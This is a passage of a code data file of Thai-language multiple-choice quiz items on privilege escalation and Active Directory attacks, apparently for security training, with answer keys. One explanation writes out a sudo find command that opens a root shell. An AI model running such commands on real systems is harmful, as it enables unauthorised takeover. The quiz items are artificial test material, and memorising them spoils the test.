        { key: 'A', text: 'เป็นแหล่งรวบรวมเทคนิคการใช้ Unix Binaries มาตรฐานในการบายพาสข้อจำกัด, ยกระดับสิทธิ์ (SUID/Sudo), และสปอว์นเชลล์' },
        { key: 'B', text: 'เป็นเว็บขายคอมพิวเตอร์มือสอง' },
        { key: 'C', text: 'เป็นดิกชันนารีแปลภาษา' },
        { key: 'D', text: 'เป็นแหล่งดาวน์โหลดเพลง' },
      ],
      correctAnswer: 'A',
      explanation: 'GTFOBins รวบรวมวิธีใช้ประโยชน์จากคำสั่ง Linux ทั่วไป (เช่น find, awk, python, less) ที่ถูกตั้งค่า sudo/suid ผิดพลาด',
      order: 4,
    },
    {
      question: 'การตั้งค่า `/etc/sudoers` แบบใดที่เปิดโอกาสให้ผู้ใช้ยกระดับเป็น root ได้อย่างง่ายดายที่สุด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`john ALL=(ALL) NOPASSWD: /usr/bin/find`' },
        { key: 'B', text: '`john ALL=(ALL) /usr/bin/passwd`' },
        { key: 'C', text: '`john ALL=(ALL) /sbin/shutdown`' },
        { key: 'D', text: '`john ALL=(ALL) DENY`' },
      ],
      correctAnswer: 'A',
      explanation: 'ผู้ใช้ john สามารถพิมพ์ `sudo find . -exec /bin/sh \\; -quit` เพื่อเปิด Root Shell ได้ทันทีโดยไม่ต้องใส่รหัสผ่าน',
      order: 5,
    },
    {
      question: 'ช่องโหว่ "Unquoted Service Path" บนระบบปฏิบัติการ Windows เกิดจากสาเหตุใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Path ของ Service มีช่องว่าง (Spaces) และไม่ได้ใส่เครื่องหมายคำพูดคร่อมไว้ ทำให้ Windows พยายามค้นหาและรันไฟล์ .exe ที่ถูกวางดักไว้ก่อนหน้า' },
        { key: 'B', text: 'การตั้งชื่อโฟลเดอร์เป็นภาษาไทย' },
        { key: 'C', text: 'การลบไฟล์ระบบทิ้ง' },
        { key: 'D', text: 'การใช้รหัสผ่านสั้นเกินไป' },
      ],
      correctAnswer: 'A',
      explanation: 'หาก Path คือ `C:\\Program Files\\My App\\service.exe` Windows จะมองหา `C:\\Program.exe` ก่อน หากผู้โจมตีมีสิทธิ์เขียนที่ C:\\ ก็จะได้สิทธิ์รันตาม Service นั้น',
      order: 6,
    },
    {
      question: 'เครื่องมือ "Mimikatz" มีชื่อเสียงโด่งดังที่สุดในด้านความสามารถใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ดึงข้อมูลรหัสผ่านตัวจริง (Plaintext Passwords), NTLM Hashes, และตั๋ว Kerberos Tickets ออกมาจากหน่วยความจำของโปรเซส LSASS' },
        { key: 'B', text: 'แคร็กรหัสผ่าน Wi-Fi ในเวลา 1 วินาที' },
        { key: 'C', text: 'ดาวน์โหลดไฟล์วิดีโอจาก YouTube' },
        { key: 'D', text: 'บีบอัดรูปภาพให้เล็กลง' },
      ],
      correctAnswer: 'A',
      explanation: 'Mimikatz เป็นเครื่องมืออันทรงพลังในการสกัด Credentials จาก Memory ของ Windows ช่วยให้ผู้โจมตีทำ Lateral Movement ได้อย่างรวดเร็ว',
      order: 7,
    },
    {
      question: 'แนวคิด "Lateral Movement" (การเคลื่อนที่ในแนวนอนข้ามเครือข่าย) หมายถึงขั้นตอนใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การใช้ข้อมูล Credentials หรือช่องโหว่ที่ได้จากเครื่องแรกเพื่อขยายการควบคุมไปยังเครื่องเซิร์ฟเวอร์หรืออุปกรณ์อื่นในเครือข่ายภายใน' },
        { key: 'B', text: 'การย้ายโต๊ะทำงานของพนักงาน' },
        { key: 'C', text: 'การเดินสายแลนใหม่รอบออฟฟิศ' },
        { key: 'D', text: 'การปรับความสูงของเก้าอี้' },
      ],
      correctAnswer: 'A',
      explanation: 'หลังจากยึดเครื่องแรกได้ (Initial Compromise) แฮกเกอร์จะสแกนและใช้รหัสผ่านที่ขโมยมาเพื่อกระโดดข้ามไปยัง Domain Controller หรือ DB Servers',
      order: 8,
    },
    {
      question: 'เทคนิค "Pass-the-Ticket" (PtT) บน Windows Active Directory ทำงานอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การขโมยตั๋ว Kerberos Ticket (TGT/TGS) ที่ถูกแคชไว้ในหน่วยความจำ แล้วนำไป Inject เข้าเซสชันของตนเพื่อเข้าถึงทรัพยากรอื่นโดยไม่ต้องใช้รหัสผ่าน' },
        { key: 'B', text: 'การซื้อตั๋วคอนเสิร์ตออนไลน์' },
        { key: 'C', text: 'การพิมพ์ตั๋วออกทางเครื่องพิมพ์' },
        { key: 'D', text: 'การส่งตั๋วทางไปรษณีย์' },
      ],
      correctAnswer: 'A',
      explanation: 'PtT ใช้ตั๋ว Kerberos ที่สกัดออกมาได้เพื่อยืนยันตัวตนกับบริการอื่นในโดเมนได้อย่างแนบเนียนโดยไม่ต้องรู้รหัสผ่านจริงของผู้ใช้',
      order: 9,
    },
    {
      question: 'เครื่องมือ "BloodHound" มีบทบาทสำคัญอย่างไรในการประเมินความปลอดภัยของ Active Directory?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ใช้ทฤษฎีกราฟ (Graph Theory) แสดงแผนภาพความสัมพันธ์ของสิทธิ์ บัญชีผู้ใช้ กลุ่ม และคอมพิวเตอร์ เพื่อค้นหาเส้นทางโจมตี (Attack Paths) สู่ Domain Admin' },
        { key: 'B', text: 'สแกนหาไฟล์เพลงในเครื่อง' },
        { key: 'C', text: 'วัดอุณหภูมิของเครื่องเซิร์ฟเวอร์' },
        { key: 'D', text: 'ทำความสะอาดหน้าจอ' },
      ],
      correctAnswer: 'A',
      explanation: 'BloodHound ช่วยให้นักทดสอบความปลอดภัยและทีม Defense มองเห็นเส้นทางการยกระดับสิทธิ์ที่ซับซ้อนใน Active Directory ได้อย่างชัดเจน',
      order: 10,
    },
    {
      question: 'การโจมตีแบบ "Kerberoasting" มุ่งเป้าไปที่บัญชีประเภทใดใน Active Directory?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Service Accounts ที่มีการผูกค่า Service Principal Names (SPN) เพื่อขอตั๋ว TGS มาทำการ Crack รหัสผ่านแบบ Offline' },
        { key: 'B', text: 'บัญชีผู้ใช้ทั่วไปที่ไม่มีสิทธิ์ใดๆ' },
        { key: 'C', text: 'บัญชีผู้ใช้นักศึกษาฝึกงาน' },
        { key: 'D', text: 'บัญชีที่ถูกปิดการใช้งานแล้ว' },
      ],
      correctAnswer: 'A',
      explanation: 'ผู้ใช้โดเมนทุกคนสามารถขอตั๋ว TGS สำหรับ SPN ได้ แล้วดึงส่วนที่เข้ารหัสด้วย NTLM Hash ของ Service Account ไปแคร็กแบบ Offline ได้อย่างปลอดภัย',
      order: 11,
    },
    {
      question: 'เทคนิค "Golden Ticket Attack" มีระดับความร้ายแรงอย่างไรในสภาพแวดล้อม Active Directory?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ร้ายแรงระดับสูงสุด: ผู้โจมตีใช้ Hash ของบัญชี `krbtgt` สร้างตั๋ว TGT ปลอมที่สามารถปลอมเป็นผู้ใช้ใดก็ได้ และเข้าถึงทุกบริการในโดเมนได้อย่างไร้ขีดจำกัด' },
        { key: 'B', text: 'มีความรุนแรงต่ำมาก ไม่ส่งผลต่อระบบ' },
        { key: 'C', text: 'ส่งผลเฉพาะเครื่องพิมพ์' },
        { key: 'D', text: 'ทำให้สีจอเปลี่ยนเป็นสีทอง' },
      ],
      correctAnswer: 'A',
      explanation: 'Golden Ticket ให้สิทธิ์ควบคุม Active Directory อย่างเบ็ดเสร็จและอยู่ได้นาน (ค่า Default คือ 10 ปี) จนกว่าจะมีการรีเซ็ตรหัสผ่าน krbtgt 2 ครั้ง',
      order: 12,
    },
    {
      question: 'สคริปต์อัตโนมัติยอดนิยมที่ใช้ค้นหาช่องโหว่ Privilege Escalation บน Linux คืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'LinPEAS (Linux Privilege Escalation Awesome Script)' },
        { key: 'B', text: 'Word' },
        { key: 'C', text: 'Excel' },
        { key: 'D', text: 'Photoshop' },
      ],
      correctAnswer: 'A',
      explanation: 'LinPEAS ตรวจสอบการตั้งค่าระบบ, Cron jobs, SUID, Sudo rules, Kernel exploits, และ Passwords ที่หลงเหลืออยู่อย่างละเอียด',
      order: 13,
    },
    {
      question: 'สคริปต์ที่ใช้ค้นหาช่องโหว่ Privilege Escalation บนระบบปฏิบัติการ Windows คืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'WinPEAS' },
        { key: 'B', text: 'Notepad' },
        { key: 'C', text: 'Calculator' },
        { key: 'D', text: 'Paint' },
      ],
      correctAnswer: 'A',
      explanation: 'WinPEAS (Windows Privilege Escalation Awesome Script) สแกนหาบริการที่มีสิทธิ์ผิดพลาด, Registry keys, AlwaysInstallElevated และ Credentials',
      order: 14,
    },
    {
      question: 'เครื่องมือ `PsExec` หรือ `wmiexec.py` (Impacket) นิยมใช้ในการทำกิจกรรมใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การรันคำสั่งและควบคุมเครื่องอื่นในเครือข่ายจากระยะไกลผ่าน SMB/WMI โดยใช้ Credentials หรือ Hashes ที่ได้มา (Lateral Movement)' },
        { key: 'B', text: 'การตัดต่อวิดีโอ' },
        { key: 'C', text: 'การบีบอัดไฟล์เสียง' },
        { key: 'D', text: 'การส่งสติ๊กเกอร์แชท' },
      ],
      correctAnswer: 'A',
      explanation: 'PsExec และ Impacket wmiexec เป็นเครื่องมือยอดนิยมที่ใช้สิทธิ์ Administrator ข้ามไปเปิด Interactive Shell บนเครื่องเป้าหมายในวงแลน',
      order: 15,
    },
    {
      question: 'ช่องโหว่ "Kernel Exploits" (เช่น Dirty COW บน Linux) มีความเสี่ยงต่อระบบอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เปิดโอกาสให้ผู้ใช้ธรรมดาสามารถแทรกโค้ดเข้าสู่ Ring 0 (Kernel Space) และได้สิทธิ์ root ทันทีโดยอาศัยข้อบกพร่องของระบบปฏิบัติการ' },
        { key: 'B', text: 'ทำให้ความเร็วอินเทอร์เน็ตลดลง' },
        { key: 'C', text: 'ทำให้ลำโพงเสียงแตก' },
        { key: 'D', text: 'ทำให้เมาส์คลิกไม่ติด' },
      ],
      correctAnswer: 'A',
      explanation: 'Kernel exploits เป็นการโจมตีระดับลึกสุดของระบบปฏิบัติการ หากระบบขาดการอัปเดต Patch ผู้ใช้ทั่วไปจะสามารถยึดสิทธิ์ root ได้อย่างง่ายดาย',
      order: 16,
    },
    {
      question: 'การตั้งค่าสิทธิ์โฟลเดอร์ที่ไม่ปลอดภัยแบบ "Weak Folder Permissions" บน Service ของ Windows ส่งผลอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ผู้ใช้ทั่วไปสามารถเขียนทับไฟล์ .exe ของ Service นั้นด้วยไฟล์ Payload ของตนเอง แล้วรอให้ Service รันด้วยสิทธิ์ SYSTEM' },
        { key: 'B', text: 'ทำให้โฟลเดอร์เปิดไม่ได้' },
        { key: 'C', text: 'ทำให้ไฟล์ในโฟลเดอร์หายไป' },
        { key: 'D', text: 'ไม่มีผลกระทบใดๆ' },
      ],
      correctAnswer: 'A',
      explanation: 'หากสิทธิ์ NTFS อนุญาตให้ Users เขียนไฟล์ลงในไดเรกทอรีของ Service ได้ ผู้โจมตีสามารถแทนที่ Binary ของบริการเพื่อยกระดับสิทธิ์ได้ทันที',
      order: 17,
    },
    {
      question: 'แนวคิด "Pivoting" ในการทดสอบเจาะระบบหมายถึงอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การใช้เครื่องคอมพิวเตอร์ที่ถูกเจาะสำเร็จแล้วเป็นสะพานเชื่อม (Proxy/Bridge) ในการเข้าถึงและโจมตีเครื่องอื่นๆ ในเครือข่ายภายในที่เครื่องภายนอกเข้าไม่ถึง' },
        { key: 'B', text: 'การหมุนหน้าจอคอมพิวเตอร์เป็นแนวตั้ง' },
        { key: 'C', text: 'การเปลี่ยนภาษาของระบบ' },
        { key: 'D', text: 'การปิดระบบรักษาความปลอดภัย' },
      ],
      correctAnswer: 'A',
      explanation: 'Pivoting ช่วยให้นักทดสอบเจาะทะลุผ่าน Dual-homed host (เครื่องที่มีการ์ดแลน 2 ขา) เข้าไปสำรวจ Isolated Internal Network ได้',
      order: 18,
    },
    {
      question: 'การโจมตีแบบ "AS-REP Roasting" แตกต่างจาก Kerberoasting อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'AS-REP Roasting มุ่งเป้าไปที่บัญชีผู้ใช้ที่มีการตั้งค่า "Do not require Kerberos preauthentication" โดยไม่ต้องใช้บัญชีโดเมนใดๆ ในการเริ่มต้นขอ AS-REP Hash' },
        { key: 'B', text: 'AS-REP Roasting ทำงานเฉพาะบนเครื่อง Linux' },
        { key: 'C', text: 'AS-REP Roasting ใช้ได้เฉพาะกับบัญชี Guest' },
        { key: 'D', text: 'ไม่มีความแตกต่างกัน' },
      ],
      correctAnswer: 'A',
      explanation: 'หาก User ปิด Pre-auth แฮกเกอร์สามารถส่งคำขอ AS-REQ ในชื่อ User นั้น แล้วรับ AS-REP ที่เข้ารหัสด้วย Password Hash มาแคร็กแบบ Offline ได้ทันที',
      order: 19,
    },
    {
      question: 'การแยกสิทธิ์บัญชีผู้ดูแลระบบตามสถาปัตยกรรม "Tiering Model" (Tier 0: DC, Tier 1: Servers, Tier 2: Workstations) มีเป้าหมายสำคัญเพื่ออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ป้องกันไม่ให้ Credential ของ Domain Admin (Tier 0) ไปถูกแคชไว้บนเครื่องลูกข่าย (Tier 2) ซึ่งจะตัดวงจร Lateral Movement ของผู้โจมตี' },
        { key: 'B', text: 'ลดจำนวนเครื่องเซิร์ฟเวอร์ในองค์กร' },
        { key: 'C', text: 'ทำให้พนักงานทำงานได้เร็วขึ้น' },
        { key: 'D', text: 'ประหยัดงบประมาณค่าไฟ' },
      ],
      correctAnswer: 'A',
      explanation: 'Tiering Model กำหนดว่าห้ามนำบัญชีระดับสูงไปล็อกอินบนเครื่องระดับต่ำกว่า เพื่อป้องกันไม่ให้แฮกเกอร์ที่ยึดเครื่องลูกข่ายขโมยตั๋ว Domain Admin ได้',
      order: 20,
    },
  ],
};
